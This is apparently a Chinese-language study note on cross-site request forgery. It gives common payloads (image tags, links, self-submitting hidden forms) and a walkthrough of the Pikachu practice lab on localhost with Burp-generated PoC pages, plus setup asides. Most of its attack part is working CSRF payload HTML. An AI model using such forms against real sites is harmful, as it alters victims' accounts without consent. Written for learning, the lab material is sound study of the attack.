什么是csrf
攻击者利用用户已经认证过的会话来执行未经用户授权的操作。攻击者会诱使用户在受信任的网站上执行恶意操作,从而利用用户的身份来发送恶意请求。这种攻击通过在受害者浏览器中注入恶意代码或链接来实施
csrf攻击的目标是利用用户在目标网站上已经建立的会话,来执行一些可能危害用户的操作,比如更改用户密码、发送恶意邮件等
简单来说,就是攻击者利用已登陆受信任网站的用户在不知情的情况下,向该站点发送恶意请求,利用的是浏览器会自动带上该站点的认证凭证(cookie)
前提:会一些基础的h5、c3以及js
常见payload
通过图片的img src属性,自动加载,发起get请求
1
2
3
| <img
src=
"http://xxxxxx?nameid=xxx&amount=xxx" width="0" height="0">
|
构建一个超链接,用户点击以后,发起get请求
使用a标签的href属性
1
2
3
| <a
href=
"http://xxxxxx?amount=1000&to=jiangang" taget="_blank">xxx<a/>
|
通过提交隐藏的表单,用户点击,自动提交,发起POST
1
2
3
4
5
6
7
| <form action=
"http://xxxxxx" method=POST>
<input type="hidden" name="account" value="xiaoming" />
<input type="hidden" name="amount" value="1000" />
<input type="hidden" name="to" value="jiangang" />
</form>
<script> document.forms[0].submit(); </script>
|
判断一个网站是否具有csrf漏洞
1.是否可以从第三方接口直接调用
2.如何对接口进行检测:抓取正常通信的包,再次请求
3.自动化检测工具,bp模块,csrfTester,https://github.com/s0md3v/Bolt
等
例题
这里我们选择安装这个pikachu的靶机,然后就可以正常访问了
安装的过程中,还是遇到了一些不是很多的事情,然后又积累了一些经验,可以当作一些小插曲
小插曲
主要就是你要在小皮面板里面打开服务,之前我是用过这个来搭建一个sql的靶机,很久之前的事情了,所以也对这些有些生疏了
这里我们可以注意一下一些稍微不一样的点
一个是phpstudy里面的结构,大概是在你的phpstudy下,也就是你最初下载文件的地方,一般都是将靶机什么的放入WWW目录下,然后有一个localhost,就是把靶机放在这些文件的下面
后面的话目录大概如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
| D:.
├─error
├─phpMyAdmin4.8.5
│ ├─doc
│ │ └─html
│ │ ├─_images
│ │ ├─_sources
│ │ └─_static
│ ├─error
│ ├─examples
│ ├─js
│ │ │ └─LC_MESSAGES
│ │ ├─fr
│ │ │ └─LC_MESSAGES
│ │ ├─gl
│ │ │ └─LC_MESSAGES
│ │ ├─he
│ │ │ └─LC_MESSAGES
│ │ ├─hu
│ │ │ └─LC_MESSAGES
│ │ ├─hy
│ │ │ └─LC_MESSAGES
│ │ ├─ia
│ │ │ └─LC_MESSAGES
│ │ ├─id
│ │ │ └─LC_MESSAGES
│ │ ├─it
│ │ │ └─LC_MESSAGES
│ │ ├─ja
│ │ │ └─LC_MESSAGES
│ │ ├─ko
│ │ │ └─LC_MESSAGES
│ │ ├─lt
│ │ │ └─LC_MESSAGES
│ │ ├─nb
│ │ │ └─LC_MESSAGES
│ │ ├─nl
│ │ │ └─LC_MESSAGES
│ │ ├─pl
│ │ │ └─LC_MESSAGES
│ │ ├─pt
│ │ │ └─LC_MESSAGES
│ │ ├─pt_BR
│ │ │ └─LC_MESSAGES
│ │ ├─ro
│ │ │ └─LC_MESSAGES
│ │ ├─ru
│ │ │ └─LC_MESSAGES
│ │ ├─si
│ │ │ └─LC_MESSAGES
│ │ ├─sk
│ │ │ └─LC_MESSAGES
│ │ ├─sl
│ │ │ └─LC_MESSAGES
│ │ ├─sq
│ │ │ └─LC_MESSAGES
│ │ ├─sr@latin
│ │ │ └─LC_MESSAGES
│ │ ├─sv
│ │ │ └─LC_MESSAGES
│ │ ├─tr
│ │ │ └─LC_MESSAGES
│ │ ├─uk
│ │ │ └─LC_MESSAGES
│ │ ├─vi
│ │ │ └─LC_MESSAGES
│ │ ├─zh_CN
│ │ │ └─LC_MESSAGES
│ │ └─zh_TW
│ │ └─LC_MESSAGES
│ ├─setup
│ │ ├─frames
│ │ └─lib
│ ├─sql
│ ├─templates
│ │ ├─columns_definitions
│ │ ├─components
│ │ ├─config
│ │ │ └─form_display
│ │ ├─console
│ │ ├─database
│ │ │ ├─central_columns
│ │ │ ├─designer
│ │ │ ├─multi_table_query
│ │ │ ├─qbe
│ │ │ ├─search
│ │ │ ├─structure
│ │ │ └─tracking
│ │ ├─display
│ │ │ ├─export
│ │ │ ├─import
│ │ │ └─results
│ │ ├─encoding
│ │ ├─error
│ │ ├─export
│ │ ├─javascript
│ │ ├─list
│ │ ├─login
│ │ │ └─twofactor
│ │ ├─navigation
│ │ ├─privileges
│ │ ├─server
│ │ │ ├─binlog
│ │ │ ├─collations
│ │ │ ├─databases
│ │ │ ├─engines
│ │ │ ├─plugins
│ │ │ └─variables
│ │ ├─table
│ │ │ ├─browse_foreigners
│ │ │ ├─chart
│ │ │ ├─gis_visualization
│ │ │ ├─insert
│ │ │ ├─relation
│ │ │ ├─search
│ │ │ ├─structure
│ │ │ └─tracking
│ │ └─test
│ │ └─gettext
│ ├─themes
│ │ ├─original
│ │ │ ├─css
│ │ │ ├─img
│ │ │ └─jquery
│ │ │ └─images
│ │ └─pmahomme
│ │ ├─css
│ │ ├─img
│ │ │ └─designer
│ │ └─jquery
│ │ └─images
│ ├─tmp
│ │ └─twig
│ │ ├─00
│ └─vendor
│ ├─bacon
│ │ └─bacon-qr-code
│ │ ├─src
│ │ │ └─BaconQrCode
│ │ │ ├─Common
│ │ │ ├─Encoder
│ │ │ ├─Exception
│ │ │ └─Renderer
│ │ │ ├─Color
│ │ │ ├─Image
│ │ │ │ └─Decorator
│ │ │ └─Text
│ │ └─tests
│ │ └─BaconQrCode
│ │ ├─Common
│ │ ├─Encoder
│ │ └─Renderer
│ │ └─Text
│ ├─bin
│ ├─composer
│ ├─google
│ │ └─recaptcha
│ │ ├─.github
│ │ │ └─ISSUE_TEMPLATE
│ │ └─src
│ │ └─ReCaptcha
│ │ └─RequestMethod
│ ├─paragonie
│ │ ├─constant_time_encoding
│ │ │ ├─src
│ │ │ └─tests
│ │ └─random_compat
│ │ ├─dist
│ │ └─lib
│ ├─phpmyadmin
│ │ ├─motranslator
│ │ │ ├─.github
│
├─phpstudy
│ └─.idea
├─pikachu
│ └─pikachu-master
│ ├─assets
│ │ ├─css
│ │ ├─font-awesome
│ │ │ └─4.5.0
│ │ │ ├─css
│ │ │ └─fonts
│ │ ├─fonts
│ │ ├─images
│ │ │ ├─avatars
│ │ │ ├─bootstrap-colorpicker
│ │ │ ├─email
│ │ │ ├─gallery
│ │ │ ├─nbaplayer
│ │ │ └─placeholder
│ │ ├─js
│ │ └─swf
│ ├─inc
│ ├─pkxss
│ │ ├─inc
│ │ ├─rkeypress
│ │ ├─xcookie
│ │ └─xfish
│ ├─test
│ ├─vul
│ │ ├─burteforce
│ │ ├─csrf
│ │ │ ├─csrfget
│ │ │ ├─csrfpost
│ │ │ └─csrftoken
│ │ ├─dir
│ │ │ └─soup
│ │ ├─fileinclude
│ │ │ └─include
│ │ ├─infoleak
│ │ ├─overpermission
│ │ │ ├─op1
│ │ │ └─op2
│ │ ├─rce
│ │ ├─sqli
│ │ │ ├─sqli_header
│ │ │ └─sqli_iu
│ │ ├─ssrf
│ │ │ └─ssrf_info
│ │ ├─unsafedownload
│ │ │ └─download
│ │ ├─unsafeupload
│ │ ├─unserilization
│ │ ├─urlredirect
│ │ ├─xss
│ │ │ ├─xssblind
│ │ │ └─xsspost
│ │ └─xxe
│ └─wiki
│ └─image
└─sql
├─images
├─index-1.html_files
│ └─icons
├─index-2.html_files
│ └─icons
├─index-3.html_files
│ └─icons
├─index.html_files
│ └─icons
├─sql-connections
│ └─.idea
└─sqli-labs
├─images
|
第二个小插曲就是我的mysql,就是启动不起来,会发现所有的什么端口之类的都被占用了
经过排查之后发现是梯子的问题,这里需要关闭系统代理
又或者是说,我们将clash改为tun模式,也就是一个虚拟网卡的模式,然后将系统代理给关闭了,这里注意开tun的时候记得点击那个服务模式再点击下载,最后就能成功了
概述
原理:小黑想要修改大白的一个信息,我就自己注册一个账号,然后修改自己的信息,发现这个修改自己信息的链接是http://www.xxx.com/edit.php?email=xiaohei@88.com&Change=Change
然后就把链接伪装一下,最后只要让小白进行点击,最后个人信息就被修改了
和xss的一个区别
主要就是一个是csrf是需要借助用户本身的一个cookie的,但是xss就是自己伪造一个cookie
get
这里我们输入账号密码进行登陆,可以看下请求的这个方式
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| GET /vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=chain&email=vince%40pikachu.com&submit=submit HTTP/1.1
Host: 127.0.0.1
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/vul/csrf/csrfget/csrf_get_edit.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ok723k7i51ah50ciseafcnqr24
Connection: close
|
这里是登陆了一个人的账号密码,然后进行修改我们的这个个人信息
这里我们就选择使用bp里面自带的这个scrf的生成poc的一个工具
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| <html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://127.0.0.1/vul/csrf/csrfget/csrf_get_edit.php">
<input type="hidden" name="sex" value="boy" />
<input type="hidden" name="phonenum" value="18626545453" />
<input type="hidden" name="add" value="chain" />
<input type="hidden" name="email" value="vince@pikachu.com" />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
|
http://127.0.0.1/vul/csrf/csrfget/csrf_get_edit.php
可以修改里面的很多值,链接发给别人就可以了
post
此处为post传参,url不再显示,无法在使用伪造url的方法攻击。可以将生成的SCRF HTML放入自己写的HTML文件中,放在服务器上,并给用户请求者个html的链接
需要构造的SCRF.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| <html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://127.0.0.1:8080/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
<input type="hidden" name="sex" value="boy" />
<input type="hidden" name="phonenum" value="999999" />
<input type="hidden" name="add" value="nba lakes" />
<input type="hidden" name="email" value="kobe@pikachu.com" />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://127.0.0.1:8080/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
<input type="hidden" name="sex" value="boy" />
<input type="hidden" name="phonenum" value="222222" />
<input type="hidden" name="add" value="nba lakes" />
<input type="hidden" name="email" value="kobe@pikachu.com" />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
|
将我们写好的html文件放入服务器中,这里的话就是自己的pikachu目录下面
http://127.0.0.1:8080/pikachu-master/SCRF.html
然后被攻击者可以访问该链接,只要点击修改,那么个人信息就将被改变
改token的
这里下载bp的一个插件SCRF Token Tracker
更改token就可以了
后面遇见相关的赛题或实战什么的再做总结
